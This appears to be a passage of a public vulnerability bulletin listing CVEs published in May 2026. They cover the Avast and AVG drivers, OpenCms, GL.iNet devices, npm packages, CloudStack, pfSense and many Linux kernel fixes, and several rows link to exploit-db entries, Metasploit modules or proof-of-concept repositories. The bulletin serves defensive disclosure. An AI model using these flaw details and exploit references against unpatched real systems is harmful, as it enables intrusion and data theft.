| www[.]avast[.]com--Avast/AVG Windows Anti Rootkit driver | The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xbb94. | 2026-05-08 | not yet calculated | CVE-2022-26523 | https://www.avast.com/bug-bounty https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/ |
| www[.]nokia[.]com--Nokia Broadcast Message Center (BMC) | Nokia Broadcast Message Center (BMC) before 13.1 allows an unauthenticated remote attacker to do OS command injection as root via shell metacharacters in the Log Scanner Search Pattern field. | 2026-05-08 | not yet calculated | CVE-2022-45899 | https://nokia.com https://www.exploit-db.com/exploits/51896 |
| n/a--Alkacon OpenCms | A Cross Site Scripting vulnerability in Alkacon OpenCms before 10.5.1 exists via cmis-online/type. | 2026-05-08 | not yet calculated | CVE-2023-42343 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| n/a--Alkacon OpenCms | Alkacon OpenCms before 10.5.1 allows remote unauthenticated attackers to obtain sensitive information via a cmis-online/query XXE attack on a Chemistry servlet. | 2026-05-08 | not yet calculated | CVE-2023-42344 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| n/a--Alkacon OpenCms | A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp. | 2026-05-08 | not yet calculated | CVE-2023-42345 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| n/a--Alkacon OpenCms | Alkacon OpenCms before 16 allows XXE when the <!DOCTYPE> refers to an external host. | 2026-05-08 | not yet calculated | CVE-2023-42346 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| www[.]gl-inet[.]com—Gl.iNet devices v.4x | Certain GL.iNet devices with 4.x firmware allow authentication bypass (resulting in administrative control of the device) via a username that is both a valid SQL statement and a valid regular expression. For example, this affects version 4.3.7 on GL-MT3000 GL-AR300M GL-B1300 GL-AX1800 GL-AR750S GL-MT2500 GL-AXT1800 GL-X3000 and GL-SFT1200. | 2026-05-08 | not yet calculated | CVE-2023-46453 | https://www.exploit-db.com/exploits/51865 |
| n/a-- Prusa PrusaSlicer v2.6.1 | In libslic3r/GCode/PostProcessor.cpp in Prusa PrusaSlicer through 2.6.1, a crafted 3mf project file can execute arbitrary code on a host where the project is sliced and G-code exported. | 2026-05-08 | not yet calculated | CVE-2023-47268 | https://help.prusa3d.com/article/post-processing-scripts_283913 https://www.prusa3d.com/page/prusaslicer_424/ https://slic3r.org/download/ https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/local-exploits/39547.txt |
| mikrotik[.]com—RouterOS v.6.40.5 to 6.49.10 | Mikrotik RouterOS (x86) 6.40.5 through 6.49.10 (fixed in 7) allows a remote attacker to cause a denial of service (device crash) via crafted packet data to the SMB service on TCP port 445. | 2026-05-08 | not yet calculated | CVE-2024-27686 | https://github.com/ice-wzl/RouterOS-SMB-DOS-POC https://www.exploit-db.com/exploits/51931 |
| n/a-- Matrix Switcher v1.1.2 | /cgi-bin/time.cgi in Atlona AT-OME-MS42 Matrix Switcher 1.1.2 allow remote authenticated users to execute arbitrary commands as root via a POST request that carries a serverName parameter. | 2026-05-08 | not yet calculated | CVE-2024-30167 | https://exchange.xforce.ibmcloud.com/vulnerabilities/285733 |
| n/a--PMS (Prison Management System) PHP v1.0 | Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page. | 2026-05-08 | not yet calculated | CVE-2024-33288 | https://www.sourcecodester.com/sql/17287/prison-management-system.html https://www.exploit-db.com/exploits/52017 |
| n/a--SOPlanning v1.52.00 | SOPlanning 1.52.00 is vulnerable to SQL Injection by an authenticated user via projets.php with statut[]. | 2026-05-08 | not yet calculated | CVE-2024-33722 | https://github.com/fuzzlove/soplanning-1.52-exploits |
| n/a--SOPlanning v1.52.00 | SOPlanning 1.52.00 is vulnerable to Cross Site Scripting (XSS) via the groupe_id parameter to process/groupe_save.php. | 2026-05-08 | not yet calculated | CVE-2024-33724 | https://github.com/fuzzlove/soplanning-1.52-exploits |
| n/a-- BYOB (Build Your Own Botnet) 2.0 | A Command Injection issue in the payload build page in BYOB (Build Your Own Botnet) 2.0 allows attackers to execute arbitrary commands on the server via a crafted build parameter. This occurs in freeze in core/generators.py. | 2026-05-08 | not yet calculated | CVE-2024-45257 | https://github.com/malwaredllc/byob https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/ https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/byob_unauth_rce.rb |
| n/a--yeti-platform | A SSTI (server side template injection) vulnerability in the custom template export function in yeti-platform yeti before 2.1.12 allows attackers to execute code on the application server. | 2026-05-08 | not yet calculated | CVE-2024-46507 | https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/ |
| n/a--yeti-platform | yeti-platform yeti before 2.1.12 allows attackers to generate valid JWT tokens is the secret is not changed (by setting YETI_AUTH_SECRET_KEY to a value other than SECRET). | 2026-05-08 | not yet calculated | CVE-2024-46508 | https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/ |
| n/a--LibreNMS | LibreNMS before 24.10.0 allows a remote attacker to execute arbitrary code via OS command injection involving AboutController.php's index(), SettingsController.php's update(), and PollDevice.php's initRrdDirectory(). | 2026-05-08 | not yet calculated | CVE-2024-51092 | https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw |
| bitcoincore[.]org—bitcoincore v28.x | Bitcoin Core through 28.x has a security issue, the details of which are not disclosed. The earliest affected version is 0.14. | 2026-05-05 | not yet calculated | CVE-2024-52911 | https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures https://bitcoincore.org https://bitcoincore.org/en/2026/05/05/disclose-cve-2024-52911/ |
| linqpad[.]net—Linqpad Pro | LINQPad before 5.52.01 Pro edition is vulnerable to Unsafe Deserialization in LINQPad.AutoRefManager::PopulateFromCache(), leading to code execution. | 2026-05-08 | not yet calculated | CVE-2024-53326 | https://www.linqpad.net/ https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad |
| 3onedata--GW1101-1D(RS-485)-TB-P | 3onedata modbus gateway device model GW1101-1D(RS-485)-TB-P (hardware version V2.2.0) allows authenticated users to execute arbitrary shell commands in the context of the root user by providing payload in the "IP address" field of the diagnosis test tools. This issue has been resolved in firmware version 3.0.59B2024080600R4353 | 2026-05-04 | not yet calculated | CVE-2025-13605 | https://cert.pl/en/posts/2026/05/CVE-2025-13605 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, the PDO Firebird driver improperly handles NUL bytes when preparing SQL queries. During token-by-token query construction, a string token containing a NUL byte is copied via strncat(), which stops at the NUL byte, dropping the closing quote and causing subsequent SQL tokens to be interpreted as part of the string. This allows SQL injection when attacker-controlled values are quoted via PDO::quote() and embedded in SQL statements. | 2026-05-10 | not yet calculated | CVE-2025-14179 | https://github.com/php/php-src/security/advisories/GHSA-w476-322c-wpvm |
| HCLSoftware--BigFix WebUI | An improper authorization vulnerability in HCL BigFix WebUI allows an authenticated user without Master Operator privileges to access internal data (site names, versions, and configuration variables) and bypass privilege requirements via unprotected endpoints lacking adequate security headers. | 2026-05-09 | not yet calculated | CVE-2025-15633 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130587 |
| HCLSoftware--BigFix WebUI | A missing authorization vulnerability in HCL BigFix WebUI allows an authenticated user without proper permissions to view sensitive environmental information via direct URL access to the unauthorized page. | 2026-05-09 | not yet calculated | CVE-2025-15634 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130587 |
| ispconfig[.]com--ISPConfig 3.3.0 | ISPConfig 3.3.0 is vulnerable to Cross Site Scripting (XSS) via the system status webpage. | 2026-05-05 | not yet calculated | CVE-2025-52206 | http://ispconfig.com https://www.ispconfig.org/blog/ispconfig-3-3-0p2-released-security-update/ |
| n/a--AstrBot 3.5.15 | AstrBotDevs AstrBot 3.5.15 has Advanced_System_for_Text_Response_and_Bot_Operations_Tool as the hardcoded private key used to sign a JWT. | 2026-05-08 | not yet calculated | CVE-2025-55449 | https://github.com/AstrBotDevs/AstrBot https://github.com/Marven11/CVE-2025-55449-AstrBot-RCE |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In jupyter_server versions through 2.17.0, the next query parameter in the login flow is insufficiently validated in `LoginFormHandler._redirect_safe()`, which allows redirects to arbitrary external domains via values such as `///example.com`. An attacker can use a crafted login URL to redirect users to a malicious site and facilitate phishing attacks. This issue is fixed in version 2.18.0. | 2026-05-05 | not yet calculated | CVE-2025-61669 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-qh7q-6qm3-653w |
| www[.]npmjs[.]com—NPM Package Parse-ini v1.0.6 | npm package parse-ini v1.0.6 is vulnerable to Prototype Pollution in index.js(). | 2026-05-07 | not yet calculated | CVE-2025-63703 | https://www.npmjs.com/package/parse-ini?activeTab=code https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3 |
| www[.]npmjs[.]com—NPM Package Parse-string | NPM package query-parser-string 1.0.0 is vulnerable to Prototype Pollution. The package does not properly sanitize user supplied query parameters and merges them to the newly created object. | 2026-05-07 | not yet calculated | CVE-2025-63704 | https://www.npmjs.com/package/query-string-parser?activeTab=readme https://github.com/victorteokw/query-string-parser/issues/3 https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b |
| www[.]npmjs[.]com—NPM Package Node v1.0.15 | NPM package node-ts-ocr 1.0.15 is vulnerable to OS Command Injection via the invokeImageOcr function in src/index.js. | 2026-05-07 | not yet calculated | CVE-2025-63705 | https://www.npmjs.com/package/node-ts-ocr https://gist.github.com/6en6ar/a2ac44da0f4e580190be3e66cfbb9a4a |
| www[.]npmjs[.]com—NPM Package npn v1.0.1 | NPM package next-npm-version1.0.1 is vulnerable to Command injection. | 2026-05-07 | not yet calculated | CVE-2025-63706 | https://github.com/afeiship/next-npm-version/issues/1 https://www.npmjs.com/package/@jswork/next-npm-version https://gist.github.com/6en6ar/607368f1fc8fe429f03c6e0d9486ba72 |
| n/a--youtubeRegex | Regex Denial of Service in youtube-regex npm package through version 1.0.5. | 2026-05-07 | not yet calculated | CVE-2025-65122 | https://github.com/regexhq/youtube-regex/issues/14 https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c |
| Apache Software Foundation--Apache CloudStack | The CloudStack Backup plugin has an improper authorization logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and has access to specific APIs can list backups from any account in the environment. This vulnerability does not allow them to see the contents of the backup. Users are recommended to upgrade to version 4.22.0.1, which fixes the issue. | 2026-05-08 | not yet calculated | CVE-2025-66170 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Apache Software Foundation--Apache CloudStack | The CloudStack Backup plugin has an improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and have access to specific APIs can create new VMs using backups of any other user of the environment. Backup plugin users using CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue. | 2026-05-08 | not yet calculated | CVE-2025-66171 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Apache Software Foundation--Apache CloudStack | The CloudStack Backup plugin has an improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and have access to specific APIs can restore a volume from any other user's backups and attach the volume to their own VMs. Backup plugin users using CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue. | 2026-05-08 | not yet calculated | CVE-2025-66172 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| www[.]Samsung[.]com--Samsung Mobile Processor | An issue was discovered in MM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, W920, W930, W1000, Modem 5123, and Modem 5300. Incorrect handling of 5G NR NAS registration accept messages leads to a Denial of Service. | 2026-05-05 | not yet calculated | CVE-2025-66369 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-66369/ |
| n/a--Sidekiq-cron | Sidekiq-cron thru 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to a cross-site scripting (xss) vulnerability via crafted URL being rended from cron.erb. | 2026-05-07 | not yet calculated | CVE-2025-67202 | https://github.com/sidekiq-cron/sidekiq-cron/issues/569 https://github.com/sidekiq-cron/sidekiq-cron/releases/tag/v2.4.0 |
| Dolibarr--dolibarr | Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Versions 22.0.2 and earlier contains an authenticated remote code execution vulnerability in the user extrafields functionality. User-controlled input from the "computed value" field is passed to PHP's `eval()` function without adequate sanitization, allowing authenticated administrators to execute arbitrary PHP code on the server. As of time of publication, no patched versions are available. | 2026-05-08 | not yet calculated | CVE-2025-67486 | https://medium.com/@abduxalilovjavohir/dolibarr-erp-authenticated-remote-code-execution-via-eval-injection-in-user-extrafields-dfc305d0118e https://github.com/Dolibarr/dolibarr/blob/22.0.2/htdocs/core/lib/functions.lib.php |
| n/a--IKUS Rdiffweb | IKUS Rdiffweb before 2.10.5 has an improper authorization flaw that allows an attacker with any valid or stolen access token to act as other users. The API does not enforce binding between the authenticated subject and the targeted user/tenant, so crafted requests can read or modify other users data and, in some cases, perform privileged actions. This issue may enable cross-tenant access. Fixed in version 2.10.6. | 2026-05-04 | not yet calculated | CVE-2025-67796 | https://gitlab.com/ikus-soft/rdiffweb https://gitlab.com/ikus-soft/rdiffweb#2106-2025-10-02 |
| www[.]bitrix24[.]com—bitrix24 | Bitrix24 through 25.100.300 allows Remote Code Execution because an actor with SOURCE/WRITE permissions for the Translate Module can upload and execute code by sending a PHP file and a .htaccess file. NOTE: this is disputed by the Supplier because this is intended behavior for the high-privileged users who can upload new translated pages to the website. | 2026-05-08 | not yet calculated | CVE-2025-67886 | https://www.bitrix24.com/self-hosted/ https://seclists.org/fulldisclosure/2025/Dec/21 https://karmainsecurity.com/pocs/CVE-2025-67886.php https://dev.1c-bitrix.ru/learning/course/?COURSE_ID=43&LESSON_ID=3055 https://dev.1c-bitrix.ru/api_help/translate/index.php |
| www[.]bitrix24[.]com—bitrix24 | 1C-Bitrix through 25.100.500 allows Remote Code Execution because an actor with SOURCE/WRITE permissions for the Translate Module can upload and execute code by sending a PHP file and a .htaccess file. NOTE: this is disputed by the Supplier because this is intended behavior for the high-privileged users who can upload new translated pages to the website. | 2026-05-08 | not yet calculated | CVE-2025-67887 | https://www.1c-bitrix.ru/support/index.php https://dev.1c-bitrix.ru/learning/course/?COURSE_ID=43&LESSON_ID=3055 https://dev.1c-bitrix.ru/api_help/translate/index.php https://seclists.org/fulldisclosure/2025/Dec/22 https://karmainsecurity.com/pocs/CVE-2025-67887.php |
| wiki[.]centos-webpanel[.]com—Control Web Panel | An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the "key" GET parameter to /admin/index.php (when the "api" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present. | 2026-05-08 | not yet calculated | CVE-2025-67888 | https://wiki.centos-webpanel.com/cwp-security-instructions https://karmainsecurity.com/KIS-2025-09 |
| n/a--RayVentory Scan Engine | RayVentory Scan Engine through 12.6 Update 8 allows attackers to gain privileges if they control the value of the PATH environment variable. NOTE: this is disputed because ability of an attacker to control the environment is a site-specific misconfiguration. | 2026-05-08 | not yet calculated | CVE-2025-69599 | https://support.raynet.de/hc/en-us/articles/19518792826132-RVY200865-RayVentory-12-6 https://github.com/Wise-Security/CVE-2025-69599 |
| n/a--Netgate pfSense CE | Netgate pfSense CE 2.7.2 allows code execution by using the module installer with a backup file with a serialized PHP object containing the post_reboot_commands property. NOTE: the Supplier disputes this because this installer is only available to admins and they are intentionally allowed to execute PHP code. | 2026-05-08 | not yet calculated | CVE-2025-69690 | https://www.linkedin.com/in/nelson-adhepeau/ https://seclists.org/fulldisclosure/2026/Feb/16 |
| n/a--Netgate pfSense CE | Netgate pfSense CE 2.8.0 allows code execution in the XMLRPC API via pfsense.exec_php. NOTE: the Supplier disputes this because the API call is only available to admins and they are intentionally allowed to execute PHP code. | 2026-05-08 | not yet calculated | CVE-2025-69691 | https://www.linkedin.com/in/nelson-adhepeau/ https://seclists.org/fulldisclosure/2026/Feb/16 |
| Assimp[.]com--Assimp v6.0.2 | Buffer Overflow vulnerability exists in Assimp versions up to 6.0.2 in the FBX Importer. The vulnerability occurs in aiMaterial::AddBinaryProperty, where a property key string from a crafted FBX file is copied into a fixed-size heap buffer using strcpy() without runtime length validation | 2026-05-04 | not yet calculated | CVE-2025-70067 | http://assimp.com https://github.com/assimp/assimp https://gist.github.com/GunP4ng/b6653184a4c5c3e608e6368227397505 |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v.6.0.2 allows a remote attacker to cause a denial of service via the FBXConverter.cpp and ConvertMeshMultiMaterial() method | 2026-05-04 | not yet calculated | CVE-2025-70069 | http://assimp.com https://gist.github.com/GunP4ng/9080ae7f0470c889a59cc3bfca445223 |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v.6.0.2 allows a remote attacker to cause a denial of service via the FBXMeshGeometry.cpp, MeshGeometry::MeshGeometry() | 2026-05-04 | not yet calculated | CVE-2025-70070 | http://assimp.com https://gist.github.com/GunP4ng/a2118ba977b10074a4477322afa7b763 |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v.6.0.2 allows a remote attacker to cause a denial of service via the FBXParser.cpp, ParseVectorDataArray() | 2026-05-04 | not yet calculated | CVE-2025-70071 | http://assimp.com https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v.6.0.2 allows a remote attacker to cause a denial of service via the FBXConverter.cpp, FBXConverter::ConvertMeshMultiMaterial() components | 2026-05-04 | not yet calculated | CVE-2025-70072 | http://assimp.com https://gist.github.com/GunP4ng/cdaf0cb89dc6f1d09a9e88fa1135894e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: ensure sb->s_fs_info is always cleaned up When hfsplus was converted to the new mount api a bug was introduced by changing the allocation pattern of sb->s_fs_info. If setup_bdev_super() fails after a new superblock has been allocated by sget_fc(), but before hfsplus_fill_super() takes ownership of the filesystem-specific s_fs_info data it was leaked. Fix this by freeing sb->s_fs_info in hfsplus_kill_super(). | 2026-05-06 | not yet calculated | CVE-2025-71271 | https://git.kernel.org/stable/c/0bcfebb83b5460d5be4e5c9dfb19cdaf3d4cb1db https://git.kernel.org/stable/c/1e38d32bb04d85a2c81204a85a34878a497128c8 https://git.kernel.org/stable/c/126fb0ce99431126b44a6c360192668c818f641f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: core: fix resource leak in most_register_interface error paths The function most_register_interface() did not correctly release resources if it failed early (before registering the device). In these cases, it returned an error code immediately, leaking the memory allocated for the interface. Fix this by initializing the device early via device_initialize() and calling put_device() on all error paths. The most_register_interface() is expected to call put_device() on error which frees the resources allocated in the caller. The put_device() either calls release_mdev() or dim2_release(), depending on the caller. Switch to using device_add() instead of device_register() to handle the split initialization. | 2026-05-06 | not yet calculated | CVE-2025-71272 | https://git.kernel.org/stable/c/a49028a796d7b94f8e3ab9bd34b18f36be235459 https://git.kernel.org/stable/c/af0b99b2214a10554adb5b868240d23af6e64e71 https://git.kernel.org/stable/c/2f483f3817fb0e4209ac5de928778b1da0cc8574 https://git.kernel.org/stable/c/1f4c9d8a1021281750c6cda126d6f8a40cc24e71 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: Use devm_kmemdup() in rtw_set_supported_band() Simplify the code by using device managed memory allocations. This also fixes a memory leak in rtw_register_hw(). The supported bands were not freed in the error path. Copied from commit 145df52a8671 ("wifi: rtw89: Convert rtw89_core_set_supported_band to use devm_*"). | 2026-05-06 | not yet calculated | CVE-2025-71273 | https://git.kernel.org/stable/c/9b5418070ee8468fac9e8bf641c83d46b85bff30 https://git.kernel.org/stable/c/ad9b80ee310ed734482a2e5da874b67f88ac0ef8 https://git.kernel.org/stable/c/1bd90e0a99fdc8dc5deb3c92bf865e4496b4b311 https://git.kernel.org/stable/c/2ba12401cc1f2d970fa2e7d5b15abde3f5abd40d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rpmsg: core: fix race in driver_override_show() and use core helper The driver_override_show function reads the driver_override string without holding the device_lock. However, the store function modifies and frees the string while holding the device_lock. This creates a race condition where the string can be freed by the store function while being read by the show function, leading to a use-after-free. To fix this, replace the rpmsg_string_attr macro with explicit show and store functions. The new driver_override_store uses the standard driver_set_override helper. Since the introduction of driver_set_override, the comments in include/linux/rpmsg.h have stated that this helper must be used to set or clear driver_override, but the implementation was not updated until now. Because driver_set_override modifies and frees the string while holding the device_lock, the new driver_override_show now correctly holds the device_lock during the read operation to prevent the race. Additionally, since rpmsg_string_attr has only ever been used for driver_override, removing the macro simplifies the code. | 2026-05-06 | not yet calculated | CVE-2025-71274 | https://git.kernel.org/stable/c/392c6b68334aa0e0ae9aba95c0a366bcb0d92f5d https://git.kernel.org/stable/c/d66b8074c555e8abb0ae19eea1c9f3635498bdde https://git.kernel.org/stable/c/47615557447185917afa432b7958f87583c417cb https://git.kernel.org/stable/c/90c8353f471821d7ccd4fe573a2402e056192494 https://git.kernel.org/stable/c/7654e6e3cd6bdee9602f6063b3c670bd556d7e61 https://git.kernel.org/stable/c/2e4a70f3c30910427e5ea848b799066d67b963d5 https://git.kernel.org/stable/c/954557957177c3c13d7c655976665b1170da5e50 https://git.kernel.org/stable/c/42023d4b6d2661a40ee2dcf7e1a3528a35c638ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: Drop the MHI auto_queue feature for IPCR DL channels MHI stack offers the 'auto_queue' feature, which allows the MHI stack to auto queue the buffers for the RX path (DL channel). Though this feature simplifies the client driver design, it introduces race between the client drivers and the MHI stack. For instance, with auto_queue, the 'dl_callback' for the DL channel may get called before the client driver is fully probed. This means, by the time the dl_callback gets called, the client driver's structures might not be initialized, leading to NULL ptr dereference. Currently, the drivers have to workaround this issue by initializing the internal structures before calling mhi_prepare_for_transfer_autoqueue(). But even so, there is a chance that the client driver's internal code path may call the MHI queue APIs before mhi_prepare_for_transfer_autoqueue() is called, leading to similar NULL ptr dereference. This issue has been reported on the Qcom X1E80100 CRD machines affecting boot. So to properly fix all these races, drop the MHI 'auto_queue' feature altogether and let the client driver (QRTR) manage the RX buffers manually. In the QRTR driver, queue the RX buffers based on the ring length during probe and recycle the buffers in 'dl_callback' once they are consumed. This also warrants removing the setting of 'auto_queue' flag from controller drivers. Currently, this 'auto_queue' feature is only enabled for IPCR DL channel. So only the QRTR client driver requires the modification. | 2026-05-06 | not yet calculated | CVE-2025-71285 | https://git.kernel.org/stable/c/7bdff9b9b0c65ac7105416fe3a40686832515e20 https://git.kernel.org/stable/c/8c464e00e0754e016816b1860fa9592dcad80eb2 https://git.kernel.org/stable/c/51731792a25cb312ca94cdccfa139eb46de1b2ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: ipc4-topology: Correct the allocation size for bytes controls The size of the data behind of scontrol->ipc_control_data for bytes controls is: [1] sizeof(struct sof_ipc4_control_data) + // kernel only struct [2] sizeof(struct sof_abi_hdr)) + payload The max_size specifies the size of [2] and it is coming from topology. Change the function to take this into account and allocate adequate amount of memory behind scontrol->ipc_control_data. With the change we will allocate [1] amount more memory to be able to hold the full size of data. | 2026-05-06 | not yet calculated | CVE-2025-71286 | https://git.kernel.org/stable/c/59fe643f21b9d59bcbedb0dfbf988ee455c23736 https://git.kernel.org/stable/c/491956b45b5f4933632ea6d8a8bdfdf045ab81e1 https://git.kernel.org/stable/c/a704a1a4394b5877b9adc31b2c3165ad0b541896 https://git.kernel.org/stable/c/1237cd9ff198cb882402572f29569e5247190974 https://git.kernel.org/stable/c/a653820700b81c9e6f05ac23b7969ecec1a18e85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: memory: mtk-smi: fix device leak on larb probe Make sure to drop the reference taken when looking up the SMI device during larb probe on late probe failure (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2025-71287 | https://git.kernel.org/stable/c/04057b86fdac3d4847913a97dc6552c0bff9b85e https://git.kernel.org/stable/c/357e16a7fc9c1fef2ea37dce9bb6b9bcb1d1687d https://git.kernel.org/stable/c/b9eccd59697f7e1cb9a714501d9af826e7f7e073 https://git.kernel.org/stable/c/1f23a48ff2b8ab47e514f7c84a4b1dbf9b848168 https://git.kernel.org/stable/c/f69535b77fa0518ad39870c00dd2995439ed5c34 https://git.kernel.org/stable/c/1288bb394d464975cea18f69940f206e235e0fe7 https://git.kernel.org/stable/c/9dae65913b32d05dbc8ff4b8a6bf04a0e49a8eb6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: memory: mtk-smi: fix device leaks on common probe Make sure to drop the reference taken when looking up the SMI device during common probe on late probe failure (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2025-71288 | https://git.kernel.org/stable/c/b8b2cf42b94c0a8efe43279643935256a6f58b9f https://git.kernel.org/stable/c/b16599fedf49fd42d174fba342a0b56103df3169 https://git.kernel.org/stable/c/984992f31cfb71b25cd0a72ef51ceb5dd6f187e8 https://git.kernel.org/stable/c/b44d090d6ca159d94b59ad4cc44ffdaca094df82 https://git.kernel.org/stable/c/9704564a70399c2787f5a7c5d347add721056e9d https://git.kernel.org/stable/c/6cfa038bddd710f544076ea2ef7792fc82fbedd6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: handle attr_set_size() errors when truncating files If attr_set_size() fails while truncating down, the error is silently ignored and the inode may be left in an inconsistent state. | 2026-05-06 | not yet calculated | CVE-2025-71289 | https://git.kernel.org/stable/c/6dfea43d11513b7f2892529de55e8f0855108a2c https://git.kernel.org/stable/c/576248a34b927e93b2fd3fff7df735ba73ad7d01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ti_fpc202: fix a potential memory leak in probe function Use for_each_child_of_node_scoped() to simplify the code and ensure the device node reference is automatically released when the loop scope ends. | 2026-05-06 | not yet calculated | CVE-2025-71290 | https://git.kernel.org/stable/c/d2975604bf1ba36ffc5a08fe8da97fd63b91c4f1 https://git.kernel.org/stable/c/dd16f314cb10e6807c74402efdfa2cccc1f15907 https://git.kernel.org/stable/c/dad9f13d967b4e53e8eaf5f9c690f8e778ad9802 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: bcm_vk: Fix possible null-pointer dereferences in bcm_vk_read() In the function bcm_vk_read(), the pointer entry is checked, indicating that it can be NULL. If entry is NULL and rc is set to -EMSGSIZE, the following code may cause null-pointer dereferences: struct vk_msg_blk tmp_msg = entry->to_h_msg[0]; set_msg_id(&tmp_msg, entry->usr_msg_id); tmp_msg.size = entry->to_h_blks - 1; To prevent these possible null-pointer dereferences, copy to_h_msg, usr_msg_id, and to_h_blks from iter into temporary variables, and return these temporary variables to the application instead of accessing them through a potentially NULL entry. | 2026-05-06 | not yet calculated | CVE-2025-71291 | https://git.kernel.org/stable/c/741c5a3a0cd893a4218fc0fc8c18403e54fcfb22 https://git.kernel.org/stable/c/ece3722169ba93734bfd1f06255e8ab7f19fe964 https://git.kernel.org/stable/c/aa97ccc3dc1eba9f4537f0410e9dbb0b05ccf2fb https://git.kernel.org/stable/c/3842f93e6e29d5cc1dcb9e5bda70587b444bed69 https://git.kernel.org/stable/c/20f2d9dbe5e972516f8f9948d7ae5b95d1ad77bd https://git.kernel.org/stable/c/ba75ecb97d3f4e95d59002c13afb6519205be6cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jfs: nlink overflow in jfs_rename If nlink is maximal for a directory (-1) and inside that directory you perform a rename for some child directory (not moving from the parent), then the nlink of the first directory is first incremented and later decremented. Normally this is fine, but when nlink = -1 this causes a wrap around to 0, and then drop_nlink issues a warning. After applying the patch syzbot no longer issues any warnings. I also ran some basic fs tests to look for any regressions. | 2026-05-06 | not yet calculated | CVE-2025-71292 | https://git.kernel.org/stable/c/2108829a59f081e822fdab8c2cd7131deb8aa8a1 https://git.kernel.org/stable/c/b4330a0d0947fbdc9d445cbbeabd8cc910a8c9ca https://git.kernel.org/stable/c/a3d66089e50a6e0142f8884471f74292102ea9aa https://git.kernel.org/stable/c/f70fcbc2ac7c24f087a2c895c5753aa730b1e479 https://git.kernel.org/stable/c/5d77c36cd4b698649f5c30c5f6c084f4f61d1880 https://git.kernel.org/stable/c/fe136426e30ca6debcf916fd6a141555ed9fde74 https://git.kernel.org/stable/c/93c325746ae59709b4f9bad4e3e4761c8d566c70 https://git.kernel.org/stable/c/9218dc26fd922b09858ecd3666ed57dfd8098da8 |
